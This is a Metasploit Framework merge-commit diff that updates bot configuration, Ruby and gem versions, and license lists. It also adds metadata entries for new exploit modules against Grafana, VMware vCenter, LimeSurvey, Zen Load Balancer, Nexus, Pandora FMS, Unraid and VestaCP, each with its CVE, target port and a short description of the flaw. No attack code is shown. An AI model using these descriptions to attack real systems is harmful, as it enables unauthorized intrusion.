Land #13314 , #13311 once more with feeling

"Land #13311, ZDI reference update to msftidy"
Fix bad regex in ZDI reference check for msftidy
2020-04-23 00:49:00 -05:00 · 2020-04-23 00:47:52 -05:00 · 2020-04-22 22:10:54 -05:00 · 2020-04-22 21:50:26 -05:00 · 2020-04-22 21:45:04 -05:00 · 2020-04-22 20:36:27 -05:00
158 changed files with 12454 additions and 1046 deletions
@@ -0,0 +1,34 @@
+# Configuration for Github App - https://github.com/dessant/label-actions
+#
+# Note: Be aware of the edge cases of YAML when writing multiline strings:
+#   - https://yaml-multiline.info/
+#   - https://github.com/dessant/label-actions/issues/1
+pulls:
+  actions:
+    needs-docs:
+      comment: |
+        Thanks for your pull request, before this can be merged - corresponding documentation for your module is required:
+
+          - [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+          - [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
+          - [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
+
+issues:
+  actions:
+    termux:
+      comment: |
+        Termux is not officially supported. https://github.com/rapid7/metasploit-framework/issues/11023
+
+        However, Metasploit reportedly does work with Termux.
+
+        Refer to the following for more information:
+
+        * https://wiki.termux.com/wiki/Metasploit_Framework
+        * termux/termux-packages/issues/715
+
+    potato:
+      close: true
+      comment: |
+        When creating an issue, please ensure that the default issue template has been updated with the required details.
+
+        Closing this issue. If you believe this issue has been closed in error, please provide any relevant output and logs which may be useful in diagnosing the issue.
@@ -1,15 +0,0 @@
-labels:
-  - name: needs-docs
-    labeled:
-      pr:
-        body: |
-          Thanks for your pull request, before this can be merged - corresponding documentation for your module is required:
-          - [Writing Module Documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
-          - [Template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
-          - [Examples](https://github.com/rapid7/metasploit-framework/tree/master/documentation/modules)
-        action: open
-    unlabeled:
-      issue:
-        body: |
-          Thank you for adding module documentation :tada:
-        action: open
@@ -1,29 +0,0 @@
-#
-# Automatically respond to any issues/pull requests that have the given labels assigned.
-#
-name: Label Commenter
-
-on:
-  issues:
-    types:
-      - labeled
-      - unlabeled
-  pull_request:
-    types:
-      - labeled
-      - unlabeled
-
-jobs:
-  comment:
-    runs-on: ubuntu-18.04
-    steps:
-      - uses: actions/checkout@v2
-        with:
-          ref: master
-
-      - name: Label Commenter
-        # Note: Using SHA explicitly for v1.2.3 - https://julienrenaux.fr/2019/12/20/github-actions-security-risk/
-        uses: peaceiris/actions-label-commenter@93941f8f189a4b92ab75059aa39fe421469253f4
-        with:
-          github_token: ${{ secrets.GITHUB_TOKEN }}
-          config_file: .github/label-commenter-config.yml
@@ -12,6 +12,7 @@ cdoughty-r7 <cdoughty-r7@github>       <chris_doughty@rapid7.com>
 dheiland-r7 <dheiland-r7@github>       <dh@layereddefense.com>
 dwelch-r7 <dwelch-r7@github>           <dean_welch@rapid7.com>
 ecarey-r7 <ecarey-r7@github>           <e@ipwnstuff.com>
+gwillcox-r7 <gwillcox-r7@github>       <Grant_Willcox@rapid7.com>
 jbarnett-r7 <jbarnett-r7@github>       <James_Barnett@rapid7.com>
 jbarnett-r7 <jbarnett-r7@github>       <jbarnett@rapid7.com>
 jinq102030 <jinq102030@github>         <Jin_Qian@rapid7.com>
@@ -155,6 +155,10 @@ Style/NumericLiterals:
  Enabled: false
  Description: 'This often hurts readability for exploit-ish code.'

+Layout/FirstArrayElementLineBreak:
+  Enabled: true
+  Description: 'This cop checks for a line break before the first element in a multi-line array.'
+
 Layout/FirstArrayElementIndentation:
  Enabled: true
  EnforcedStyle: consistent
@@ -1 +1 @@
-2.6.5
+2.6.6
@@ -11,8 +11,8 @@ addons:
      - graphviz
 language: ruby
 rvm:
-  - '2.5.7'
-  - '2.6.5'
+  - '2.5.8'
+  - '2.6.6'

 env:
  - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
@@ -1,4 +1,4 @@
-FROM ruby:2.6.5-alpine3.10 AS builder
+FROM ruby:2.6.6-alpine3.10 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.83)
+    metasploit-framework (5.0.86)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -11,6 +11,7 @@ PATH
      bcrypt (= 3.1.12)
      bcrypt_pbkdf
      bit-struct
+      bson
      concurrent-ruby (= 1.0.5)
      dnsruby
      ed25519
@@ -27,12 +28,13 @@ PATH
      metasploit-concern (~> 2.0.0)
      metasploit-credential (~> 3.0.0)
      metasploit-model (~> 2.0.4)
-      metasploit-payloads (= 1.3.86)
+      metasploit-payloads (= 1.3.91)
      metasploit_data_models (~> 3.0.10)
      metasploit_payloads-mettle (= 0.5.21)
      mqtt
      msgpack
      nessus_rest
+      net-ldap
      net-ssh
      network_interface
      nexpose
@@ -118,23 +120,23 @@ GEM
    arel-helpers (2.11.0)
      activerecord (>= 3.1.0, < 7)
    ast (2.4.0)
-    aws-eventstream (1.0.3)
-    aws-partitions (1.288.0)
-    aws-sdk-core (3.92.0)
-      aws-eventstream (~> 1.0, >= 1.0.2)
+    aws-eventstream (1.1.0)
+    aws-partitions (1.296.0)
+    aws-sdk-core (3.94.0)
+      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.239.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.151.0)
+    aws-sdk-ec2 (1.152.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.34.0)
+    aws-sdk-iam (1.35.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
    aws-sdk-kms (1.30.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.61.1)
+    aws-sdk-s3 (1.61.2)
      aws-sdk-core (~> 3, >= 3.83.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.1)
@@ -142,8 +144,9 @@ GEM
      aws-eventstream (~> 1.0, >= 1.0.2)
    bcrypt (3.1.12)
    bcrypt_pbkdf (1.0.1)
-    bindata (2.4.6)
+    bindata (2.4.7)
    bit-struct (0.16)
+    bson (4.8.2)
    builder (3.2.4)
    byebug (11.1.1)
    coderay (1.1.2)
@@ -173,7 +176,7 @@ GEM
      railties (>= 4.2.0)
    faker (2.2.1)
      i18n (>= 0.8)
-    faraday (1.0.0)
+    faraday (1.0.1)
      multipart-post (>= 1.2, < 3)
    faye-websocket (0.10.9)
      eventmachine (>= 0.12.0)
@@ -191,7 +194,7 @@ GEM
    jsobfu (0.4.2)
      rkelly-remix
    json (2.3.0)
-    loofah (2.4.0)
+    loofah (2.5.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
    memory_profiler (0.9.14)
@@ -214,7 +217,7 @@ GEM
      activemodel (~> 4.2.6)
      activesupport (~> 4.2.6)
      railties (~> 4.2.6)
-    metasploit-payloads (1.3.86)
+    metasploit-payloads (1.3.91)
    metasploit_data_models (3.0.10)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -233,6 +236,7 @@ GEM
    msgpack (1.3.3)
    multipart-post (2.1.1)
    nessus_rest (0.1.6)
+    net-ldap (0.16.2)
    net-ssh (5.2.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
@@ -246,7 +250,7 @@ GEM
    packetfu (1.1.13)
      pcaprub
    parallel (1.19.1)
-    parser (2.7.0.5)
+    parser (2.7.1.1)
      ast (~> 2.4.0)
    patch_finder (1.0.2)
    pcaprub (0.13.0)
@@ -262,13 +266,13 @@ GEM
      activerecord (~> 4.0)
      arel (>= 4.0.1)
      pg_array_parser (~> 0.0.9)
-    pry (0.13.0)
+    pry (0.13.1)
      coderay (~> 1.1)
      method_source (~> 1.0)
    pry-byebug (3.9.0)
      byebug (~> 11.0)
      pry (~> 0.13.0)
-    public_suffix (4.0.3)
+    public_suffix (4.0.4)
    rack (1.6.13)
    rack-protection (1.5.5)
      rack
@@ -365,14 +369,14 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.9.2)
-    rubocop (0.80.1)
+    rubocop (0.82.0)
      jaro_winkler (~> 1.5.1)
      parallel (~> 1.10)
      parser (>= 2.7.0.1)
      rainbow (>= 2.2.2, < 4.0)
      rexml
      ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 1.4.0, < 1.7)
+      unicode-display_width (>= 1.4.0, < 2.0)
    ruby-macho (2.2.0)
    ruby-prof (1.3.1)
    ruby-progressbar (1.10.1)
@@ -406,11 +410,11 @@ GEM
    tilt (2.0.10)
    timecop (0.9.1)
    ttfunk (1.6.2.1)
-    tzinfo (1.2.6)
+    tzinfo (1.2.7)
      thread_safe (~> 0.1)
    tzinfo-data (1.2019.3)
      tzinfo (>= 1.0.0)
-    unicode-display_width (1.6.1)
+    unicode-display_width (1.7.0)
    warden (1.2.7)
      rack (>= 1.0)
    websocket-driver (0.7.1)
@@ -10,18 +10,19 @@ afm, 0.2.2, MIT
 arel, 6.0.4, MIT
 arel-helpers, 2.11.0, MIT
 ast, 2.4.0, MIT
-aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.288.0, "Apache 2.0"
-aws-sdk-core, 3.92.0, "Apache 2.0"
-aws-sdk-ec2, 1.151.0, "Apache 2.0"
-aws-sdk-iam, 1.34.0, "Apache 2.0"
+aws-eventstream, 1.1.0, "Apache 2.0"
+aws-partitions, 1.296.0, "Apache 2.0"
+aws-sdk-core, 3.94.0, "Apache 2.0"
+aws-sdk-ec2, 1.152.0, "Apache 2.0"
+aws-sdk-iam, 1.35.0, "Apache 2.0"
 aws-sdk-kms, 1.30.0, "Apache 2.0"
-aws-sdk-s3, 1.61.1, "Apache 2.0"
+aws-sdk-s3, 1.61.2, "Apache 2.0"
 aws-sigv4, 1.1.1, "Apache 2.0"
 bcrypt, 3.1.12, MIT
 bcrypt_pbkdf, 1.0.1, MIT
-bindata, 2.4.6, ruby
+bindata, 2.4.7, ruby
 bit-struct, 0.16, ruby
+bson, 4.8.2, "Apache 2.0"
 builder, 3.2.4, MIT
 bundler, 1.17.3, MIT
 byebug, 11.1.1, "Simplified BSD"
@@ -41,7 +42,7 @@ eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 5.1.2, MIT
 factory_bot_rails, 5.1.1, MIT
 faker, 2.2.1, MIT
-faraday, 1.0.0, MIT
+faraday, 1.0.1, MIT
 faye-websocket, 0.10.9, "Apache 2.0"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
@@ -53,14 +54,14 @@ jaro_winkler, 1.5.4, MIT
 jmespath, 1.4.0, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.3.0, ruby
-loofah, 2.4.0, MIT
+loofah, 2.5.0, MIT
 memory_profiler, 0.9.14, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 3.0.4, "New BSD"
-metasploit-framework, 5.0.83, "New BSD"
+metasploit-framework, 5.0.86, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.3.86, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 1.3.90, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.10, "New BSD"
 metasploit_payloads-mettle, 0.5.21, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
@@ -79,16 +80,16 @@ openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 parallel, 1.19.1, MIT
-parser, 2.7.0.5, MIT
+parser, 2.7.1.1, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.0, LGPL-2.1
 pdf-reader, 2.4.0, MIT
 pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
-pry, 0.13.0, MIT
+pry, 0.13.1, MIT
 pry-byebug, 3.9.0, MIT
-public_suffix, 4.0.3, MIT
+public_suffix, 4.0.4, MIT
 rack, 1.6.13, MIT
 rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
@@ -128,7 +129,7 @@ rspec-mocks, 3.9.1, MIT
 rspec-rails, 4.0.0, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.9.2, MIT
-rubocop, 0.80.1, MIT
+rubocop, 0.82.0, MIT
 ruby-macho, 2.2.0, MIT
 ruby-prof, 1.3.1, "Simplified BSD"
 ruby-progressbar, 1.10.1, MIT
@@ -149,9 +150,9 @@ thread_safe, 0.3.6, "Apache 2.0"
 tilt, 2.0.10, MIT
 timecop, 0.9.1, MIT
 ttfunk, 1.6.2.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 1.2.6, MIT
+tzinfo, 1.2.7, MIT
 tzinfo-data, 1.2019.3, MIT
-unicode-display_width, 1.6.1, MIT
+unicode-display_width, 1.7.0, MIT
 warden, 1.2.7, MIT
 websocket-driver, 0.7.1, "Apache 2.0"
 websocket-extensions, 0.1.4, "Apache 2.0"
@@ -1712,6 +1712,46 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_admin/http/grafana_auth_bypass": {
+    "name": "Grafana 2.0 through 5.2.2 authentication bypass for LDAP and OAuth",
+    "fullname": "auxiliary/admin/http/grafana_auth_bypass",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-08-14",
+    "type": "auxiliary",
+    "author": [
+      "Rene Riedling",
+      "Sebastian Solnica"
+    ],
+    "description": "This module generates a remember me cookie for a valid username. Through unpropper seeding \n        while userdate are requested from LDAP or OAuth it's possible to craft a valid remember me cookie. \n        This cookie can be used for bypass authentication for everyone knowing a valid username.",
+    "references": [
+      "CVE-2018-15727",
+      "URL-https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15727",
+      "URL-https://grafana.com/blog/2018/08/29/grafana-5.2.3-and-4.6.4-released-with-important-security-fix/"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 3000,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-04-20 09:15:58 +0000",
+    "path": "/modules/auxiliary/admin/http/grafana_auth_bypass.py",
+    "is_install_path": true,
+    "ref_name": "admin/http/grafana_auth_bypass",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_admin/http/hp_web_jetadmin_exec": {
    "name": "HP Web JetAdmin 6.5 Server Arbitrary Command Execution",
    "fullname": "auxiliary/admin/http/hp_web_jetadmin_exec",
@@ -4581,6 +4621,54 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_admin/ldap/vmware_vcenter_vmdir_auth_bypass": {
+    "name": "VMware vCenter Server vmdir Authentication Bypass",
+    "fullname": "auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-04-09",
+    "type": "auxiliary",
+    "author": [
+      "JJ Lehmann",
+      "Ofri Ziv",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module bypasses LDAP authentication in VMware vCenter Server's\n          vmdir service to add an arbitrary administrator user. Version 6.7\n          prior to the 6.7U3f update is vulnerable.",
+    "references": [
+      "CVE-2020-3952",
+      "URL-https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 389,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-04-22 20:36:27 +0000",
+    "path": "/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb",
+    "is_install_path": true,
+    "ref_name": "admin/ldap/vmware_vcenter_vmdir_auth_bypass",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "service-resource-loss"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "config-changes"
+      ]
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_admin/maxdb/maxdb_cons_exec": {
    "name": "SAP MaxDB cons.exe Remote Command Injection",
    "fullname": "auxiliary/admin/maxdb/maxdb_cons_exec",
@@ -7380,6 +7468,43 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_admin/ubiquiti/ubiquiti_config": {
+    "name": "Ubiquiti Configuration Importer",
+    "fullname": "auxiliary/admin/ubiquiti/ubiquiti_config",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "h00die"
+    ],
+    "description": "This module imports an Ubiquiti device configuration.\n        The db file within the .unf backup is the data file for\n        Unifi. This module can take either the db file or .unf.",
+    "references": [
+
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 22,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-03-21 11:00:25 +0000",
+    "path": "/modules/auxiliary/admin/ubiquiti/ubiquiti_config.rb",
+    "is_install_path": true,
+    "ref_name": "admin/ubiquiti/ubiquiti_config",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_admin/upnp/soap_portmapping": {
    "name": "UPnP IGD SOAP Port Mapping Utility",
    "fullname": "auxiliary/admin/upnp/soap_portmapping",
@@ -18299,6 +18424,50 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_gather/vmware_vcenter_vmdir_ldap": {
+    "name": "VMware vCenter Server vmdir Information Disclosure",
+    "fullname": "auxiliary/gather/vmware_vcenter_vmdir_ldap",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-04-09",
+    "type": "auxiliary",
+    "author": [
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module uses an anonymous-bind LDAP connection to dump data from\n          the vmdir service in VMware vCenter Server version 6.7 prior to the\n          6.7U3f update.",
+    "references": [
+      "CVE-2020-3952",
+      "URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 389,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2020-04-22 16:33:38 +0000",
+    "path": "/modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb",
+    "is_install_path": true,
+    "ref_name": "gather/vmware_vcenter_vmdir_ldap",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_gather/windows_deployment_services_shares": {
    "name": "Microsoft Windows Deployment Services Unattend Gatherer",
    "fullname": "auxiliary/gather/windows_deployment_services_shares",
@@ -26624,6 +26793,61 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/limesurvey_zip_traversals": {
+    "name": "LimeSurvey Zip Path Traversals",
+    "fullname": "auxiliary/scanner/http/limesurvey_zip_traversals",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-04-02",
+    "type": "auxiliary",
+    "author": [
+      "h00die",
+      "Matthew Aberegg",
+      "Michael Burkey",
+      "Federico Fernandez",
+      "Alejandro Parodi"
+    ],
+    "description": "This module exploits an authenticated path traversal vulnerability found in LimeSurvey\n          versions between 4.0 and 4.1.11 with CVE-2020-11455 or <= 3.15.9 with CVE-2019-9960,\n          inclusive.\n          In CVE-2020-11455 the getZipFile function within the filemanager functionality\n          allows for arbitrary file download.  The file retrieved may be deleted after viewing,\n          which was confirmed in testing.\n          In CVE-2019-9960 the szip function within the downloadZip functionality allows\n          for arbitrary file download.\n          Verified against 4.1.11-200316, 3.15.0-181008, 3.9.0-180604, 3.6.0-180328,\n          3.0.0-171222, and 2.70.0-170921.",
+    "references": [
+      "EDB-48297",
+      "CVE-2020-11455",
+      "URL-https://github.com/LimeSurvey/LimeSurvey/commit/daf50ebb16574badfb7ae0b8526ddc5871378f1b",
+      "CVE-2019-9960",
+      "URL-https://www.secsignal.org/en/news/cve-2019-9960-arbitrary-file-download-in-limesurvey/",
+      "URL-https://github.com/LimeSurvey/LimeSurvey/commit/1ed10d3c423187712b8f6a8cb2bc9d5cc3b2deb8"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-04-16 02:04:17 +0000",
+    "path": "/modules/auxiliary/scanner/http/limesurvey_zip_traversals.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/limesurvey_zip_traversals",
+    "check": false,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/linknat_vos_traversal": {
    "name": "Linknat Vos Manager Traversal",
    "fullname": "auxiliary/scanner/http/linknat_vos_traversal",
@@ -32247,6 +32471,53 @@
    },
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/zenload_balancer_traversal": {
+    "name": "Zen Load Balancer Directory Traversal",
+    "fullname": "auxiliary/scanner/http/zenload_balancer_traversal",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2020-04-10",
+    "type": "auxiliary",
+    "author": [
+      "Basim Alabdullah",
+      "Dhiraj Mishra"
+    ],
+    "description": "This module exploits a authenticated directory traversal vulnerability in Zen Load\n          Balancer `v3.10.1`. The flaw exists in 'index.cgi' not properly handling 'filelog='\n          parameter which allows a malicious actor to load arbitrary file path.",
+    "references": [
+      "EDB-48308"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 444,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2020-04-16 10:52:10 +0000",
+    "path": "/modules/auxiliary/scanner/http/zenload_balancer_traversal.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/zenload_balancer_traversal",
+    "check": false,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/zenworks_assetmanagement_fileaccess": {
    "name": "Novell ZENworks Asset Management 7.5 Remote File Access",
    "fullname": "auxiliary/scanner/http/zenworks_assetmanagement_fileaccess",
@@ -51346,7 +51617,7 @@
      "Unix In-Memory",
      "Linux Dropper"
    ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2020-04-12 20:10:17 +0000",
    "path": "/modules/exploits/linux/http/axis_srv_parhand_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/axis_srv_parhand_rce",
@@ -51944,7 +52215,7 @@
      "Python",
      "Unix Command"
    ],
-    "mod_time": "2020-01-14 10:46:04 +0000",
+    "mod_time": "2020-04-20 20:06:52 +0000",
    "path": "/modules/exploits/linux/http/citrix_dir_traversal_rce.rb",
    "is_install_path": true,
    "ref_name": "linux/http/citrix_dir_traversal_rce",
@@ -56257,6 +56528,67 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/nexus_repo_manager_el_injection": {
+    "name": "Nexus Repository Manager Java EL Injection RCE",
+    "fullname": "exploit/linux/http/nexus_repo_manager_el_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-03-31",
+    "type": "exploit",
+    "author": [
+      "Alvaro Muñoz",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits a Java Expression Language (EL) injection in\n          Nexus Repository Manager versions up to and including 3.21.1 to\n          execute code as the Nexus user.\n\n          This is a post-authentication vulnerability, so credentials are\n          required to exploit the bug. Any user regardless of privilege level\n          may be used.\n\n          Tested against 3.21.1-01.",
+    "references": [
+      "CVE-2020-10199",
+      "URL-https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype",
+      "URL-https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31"
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 8081,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Nexus Repository Manager <= 3.21.1"
+    ],
+    "mod_time": "2020-04-22 10:44:07 +0000",
+    "path": "/modules/exploits/linux/http/nexus_repo_manager_el_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/nexus_repo_manager_el_injection",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/nginx_chunked_size": {
    "name": "Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow",
    "fullname": "exploit/linux/http/nginx_chunked_size",
@@ -56608,6 +56940,54 @@
    },
    "needs_cleanup": true
  },
+  "exploit_linux/http/pandora_ping_cmd_exec": {
+    "name": "Pandora FMS Ping Authenticated Remote Code Execution",
+    "fullname": "exploit/linux/http/pandora_ping_cmd_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-03-09",
+    "type": "exploit",
+    "author": [
+      "Onur ER <onur@onurer.net>"
+    ],
+    "description": "This module exploits a vulnerability found in Pandora FMS 7.0NG and lower.\n          net_tools.php in Pandora FMS 7.0NG allows remote attackers to execute arbitrary OS commands.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "x86, x64",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic Target"
+    ],
+    "mod_time": "2020-04-16 02:04:17 +0000",
+    "path": "/modules/exploits/linux/http/pandora_ping_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/pandora_ping_cmd_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/panos_readsessionvars": {
    "name": "Palo Alto Networks readSessionVarsFromFile() Session Corruption",
    "fullname": "exploit/linux/http/panos_readsessionvars",
@@ -57106,7 +57486,7 @@
      "Unix In-Memory",
      "Linux Dropper"
    ],
-    "mod_time": "2019-12-03 10:39:58 +0000",
+    "mod_time": "2020-04-20 20:06:52 +0000",
    "path": "/modules/exploits/linux/http/pulse_secure_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/http/pulse_secure_cmd_exec",
@@ -58794,6 +59174,57 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/unraid_auth_bypass_exec": {
+    "name": "Unraid 6.8.0 Auth Bypass PHP Code Execution",
+    "fullname": "exploit/linux/http/unraid_auth_bypass_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-02-10",
+    "type": "exploit",
+    "author": [
+      "Nicolas CHATELAIN <n.chatelain@sysdream.com>"
+    ],
+    "description": "This module exploits two vulnerabilities affecting Unraid 6.8.0.\n          An authentication bypass is used to gain access to the administrative\n          interface, and an insecure use of the extract PHP function can be abused\n          for arbitrary code execution as root.",
+    "references": [
+      "CVE-2020-5847",
+      "CVE-2020-5849",
+      "URL-https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/",
+      "URL-https://forums.unraid.net/topic/88253-critical-security-vulnerabilies-discovered/"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2020-04-16 17:17:02 +0000",
+    "path": "/modules/exploits/linux/http/unraid_auth_bypass_exec.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/unraid_auth_bypass_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_linux/http/vap2500_tools_command_exec": {
    "name": "Arris VAP2500 tools_command.php Command Execution",
    "fullname": "exploit/linux/http/vap2500_tools_command_exec",
@@ -58901,6 +59332,69 @@
    },
    "needs_cleanup": null
  },
+  "exploit_linux/http/vestacp_exec": {
+    "name": "Vesta Control Panel Authenticated Remote Code Execution",
+    "fullname": "exploit/linux/http/vestacp_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-03-17",
+    "type": "exploit",
+    "author": [
+      "Mehmet Ince <mehmet@mehmetince.net>"
+    ],
